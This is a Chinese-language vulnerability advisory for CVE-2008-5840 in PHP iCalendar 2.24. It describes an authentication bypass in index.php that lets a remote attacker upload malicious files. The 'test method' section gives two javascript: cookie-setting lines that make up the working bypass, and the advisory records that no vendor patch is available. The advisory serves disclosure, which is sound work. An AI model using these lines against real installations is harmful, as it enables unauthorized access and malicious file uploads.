发布日期：2008-09-22
更新日期：2009-01-06

受影响系统：

PHP iCalendar PHP iCalendar 2.24

描述：

---

BUGTRAQ  ID: 31320
CVE(CAN) ID: CVE-2008-5840

PHP iCalendar是基于PHP的iCal文件查看器/解析器，用于在浏览器中显示日历。

PHP iCalendar的index.php脚本中没有执行充分地安全限制，远程攻击者可以使用包含有URL编码.ICS文件的特制cookie（将phpicalendar和phpicalendar_login设置为1）绕过认证限制上传恶意文件。

<*来源：EgiX （n0b0d13s@gmail.com）
  
  链接：http://secunia.com/advisories/31944
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";

建议：

---

厂商补丁：

PHP iCalendar
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.phpicalendar.net/

浏览次数：2362
严重程度：0（网友投票）